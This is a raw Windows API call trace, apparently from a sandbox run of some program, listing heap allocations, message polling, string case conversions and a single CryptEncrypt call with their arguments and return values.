[0262.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0262.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0262.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0262.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0262.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0262.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0262.252] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0262.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0262.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0262.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0262.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0262.252] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.252] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0262.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0262.253] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0262.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0262.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0262.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0262.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0262.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0262.254] CharLowerBuffW (in: lpsz="byte[36384]", cchLength=0xb | out: lpsz="byte[36384]") returned 0xb [0262.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0262.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0262.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0262.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0262.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0262.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0262.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0262.254] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0262.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0262.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0262.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0262.255] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0262.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0262.255] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.255] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0262.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0262.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0262.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0262.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0262.256] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.256] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.256] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0262.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0262.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0262.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0262.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0262.256] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0262.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0262.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0262.256] CryptEncrypt (in: hKey=0xaa5760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24c9698*, pdwDataLen=0x8bef68*=0x8e1e, dwBufLen=0x8e20 | out: pbData=0x24c9698*, pdwDataLen=0x8bef68*=0x8e20) returned 1 [0262.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0262.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0262.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2190 [0262.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0262.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0262.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0262.257] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0262.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0262.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0262.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0262.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0262.258] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.258] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0262.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0262.258] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0262.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0262.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0262.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0262.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0262.259] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.259] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0262.259] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0262.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0262.259] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0262.259] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0262.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.259] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0262.259] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.260] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0262.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0262.260] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0262.260] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0262.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.260] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0262.260] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.260] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0262.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.260] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.260] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0262.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0262.261] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0262.261] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0262.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0262.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0262.261] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0262.261] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.261] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0262.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0262.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0262.261] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.262] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.262] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0262.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.263] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.263] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.263] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0262.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.264] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0262.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0262.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0262.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.265] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0262.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0262.265] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0262.265] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0262.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0262.265] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0262.265] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.265] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0262.265] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.265] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0262.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0262.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0262.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0262.266] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.266] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0262.266] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0262.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 